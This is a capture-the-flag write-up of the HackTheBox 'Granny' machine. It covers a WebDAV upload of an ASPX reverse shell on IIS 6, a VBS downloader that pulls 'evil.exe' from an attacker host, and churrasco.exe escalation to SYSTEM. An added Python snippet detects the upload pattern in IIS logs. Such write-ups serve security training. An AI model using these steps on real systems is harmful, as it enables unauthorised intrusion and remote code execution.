# HackTheBox - Granny Writeup

###### tags: `writeup` `HackTheBox` `Granny` `Easy` `OSCP` `vbs` `JuicyPotato`

## :computer: Port Scanning

```bash
# Nmap 7.92 scan initiated Tue Apr 26 06:02:09 2022 as: nmap -sV -T4 -sS -sC -v -p- -oN Ports 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.058s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Date: Tue, 26 Apr 2022 10:03:49 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  Server Type: Microsoft-IIS/6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 26 06:03:49 2022 -- 1 IP address (1 host up) scanned in 100.30 seconds
```

As we can see, the nmap scan found WebDAV, so after looking at the website we are going to use **cadaver** to enumerate it.

## :eye: Enumeration

After bruteforcing directories I discovered this:

![](https://i.imgur.com/7uzNlVI.png)

To see the components of the web I used the **WhatWeb** tool:

![](https://i.imgur.com/TIdZRaY.png)

After looking into how to exploit it, I finally tried to upload a reverse shell using WebDAV.
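The two methods nmap marks as risky above, PUT and MOVE, are exactly what a WebDAV webshell upload relies on: store the file under a harmless extension, then MOVE it to a script extension. As an added example that is not part of the original writeup, this Python snippet hunts for that chain in IIS W3C logs; the log lines and the client addresses are constructed, and the field list is a trimmed version of the IIS 6 default.

```python
from collections import defaultdict
from datetime import datetime, timedelta

SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx")
WINDOW = timedelta(minutes=10)

# Constructed IIS 6 W3C sample, not real Granny logs. The MOVE Destination header
# is not logged, so the new name is inferred from a later GET of a script nobody PUT.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2022-04-26 10:05:01 GET / - 80 - 10.10.14.3 200
2022-04-26 10:05:30 PUT /shell.txt - 80 - 10.10.14.3 201
2022-04-26 10:05:41 MOVE /shell.txt - 80 - 10.10.14.3 201
2022-04-26 10:06:02 GET /shell.aspx - 80 - 10.10.14.3 200
2022-04-26 10:07:10 PUT /notes.txt - 80 - 10.10.14.9 201
2022-04-26 10:07:15 GET /notes.txt - 80 - 10.10.14.9 200
"""

def parse(log_text):
    """Yield one dict per request, naming columns from the #Fields header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rec = dict(zip(fields, line.split()))
            rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
            yield rec

def find_rename_uploads(log_text):
    """Return (client, uploaded_uri, executed_uri) for PUT -> MOVE -> GET <script> chains."""
    recs = sorted(parse(log_text), key=lambda r: r["ts"])
    put_uris = {r["cs-uri-stem"].lower() for r in recs if r["cs-method"] == "PUT"}
    per_client = defaultdict(list)
    for r in recs:
        per_client[r["c-ip"]].append(r)
    hits = []
    for ip, reqs in per_client.items():
        for i, put in enumerate(reqs):
            if put["cs-method"] != "PUT" or not put["sc-status"].startswith("2"):
                continue  # only successful uploads matter
            later = [r for r in reqs[i + 1:] if r["ts"] - put["ts"] <= WINDOW]
            moved = any(r["cs-method"] in ("MOVE", "COPY") and r["cs-uri-stem"] == put["cs-uri-stem"]
                        for r in later)
            for r in later:
                uri = r["cs-uri-stem"].lower()
                # a script that was requested but never uploaded under that name
                if moved and r["cs-method"] == "GET" and uri.endswith(SCRIPT_EXT) and uri not in put_uris:
                    hits.append((ip, put["cs-uri-stem"], r["cs-uri-stem"]))
    return hits
```

Disabling PUT/MOVE on the WebDAV publishing point, or restricting them to authenticated users, removes the pattern at the source; the log check is the compensating control when that is not possible.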
## :bomb: Exploitation

First we enumerate WebDAV to see which file extensions it accepts:

![](https://i.imgur.com/sV4C3T4.png)

Now we know that we can upload txt files, so we rename shell.aspx to shell.txt and, once it is uploaded, rename it back with **cadaver**:

![](https://i.imgur.com/OEOxIwu.png)

In the directory where we started cadaver we need to have an aspx reverse shell downloaded; I used this one, changing the port and the IP: https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

As we can see in the next image, we can upload it with these commands:

```bash
upload shell.txt
mv shell.txt shell.aspx
```

![](https://i.imgur.com/koLf8w9.png)

Now start a netcat listener and, if we load the web page in the browser, we should receive a reverse shell:

![](https://i.imgur.com/fgGLWcd.png)

![](https://i.imgur.com/471fpw4.png)

Now we are nt authority\network service and we want nt authority\system, so it's time to look into how to privesc.

![](https://i.imgur.com/AhYjz6M.png)

---

### ⏫ Root Privesc

First launch systeminfo to learn the version of the machine:

```bash
systeminfo
systeminfo

Host Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 1 Hours, 12 Minutes, 25 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 751 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,296 MB
Page File: In Use:         174 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
```

Next launch `whoami /all` to enumerate the privileges:

```bash
whoami /all
whoami /all

USER INFORMATION
----------------

User Name                    SID
============================ ========
nt authority\network service S-1-5-20


GROUP INFORMATION
-----------------

Group Name                       Type             SID                                            Attributes
================================ ================ ============================================== ==================================================
NT AUTHORITY\NETWORK SERVICE     User             S-1-5-20                                       Mandatory group, Enabled by default, Enabled group
Everyone                         Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
GRANNY\IIS_WPG                   Alias            S-1-5-21-1709780765-3897210020-3926566182-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users    Alias            S-1-5-32-559                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                    Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE             Well-known group S-1-5-6                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization   Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
LOCAL                            Well-known group S-1-2-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                    Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
```

Knowing that the server is Windows Server 2003 and that SeImpersonatePrivilege is enabled, we may be able to privesc using Juicy Potato, but before downloading anything we are going to build a wget VBS script on the target machine to transfer files easily. On the target machine use these commands:

> I prefer to do this in C:\Windows\Temp so we can write without problems

```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```

After executing each command one by one, we can download files from our HTTP server with this command:

```bash
cscript wget.vbs http://10.10.10.10/evil.exe evil.exe
```

### JuicyPotato

We meet the prerequisites for JuicyPotato, but since the server version is older than what JuicyPotato normally supports, we are going to use a different variant called churrasco.exe, which works on Server 2003 and Windows XP. Here's a complete guide on how to use it: [click here](https://binaryregion.wordpress.com/2021/08/04/privilege-escalation-windows-churrasco-exe/).

I downloaded churrasco.exe from the page above and uploaded it using the script.

![](https://i.imgur.com/QulSJgo.png)

To use it, you only have to execute it followed by the command you want to run; in my case I spawned a cmd with SYSTEM privileges, and with that I can read all the flags.

![](https://i.imgur.com/Bbwl3fG.png)

---

### You can find me on:

:bird: [**Twitter**](https://twitter.com/Aka_Mecanico)
:desktop_computer: [**Github**](https://github.com/Mec4nico)
:ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico)
:green_book: [**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)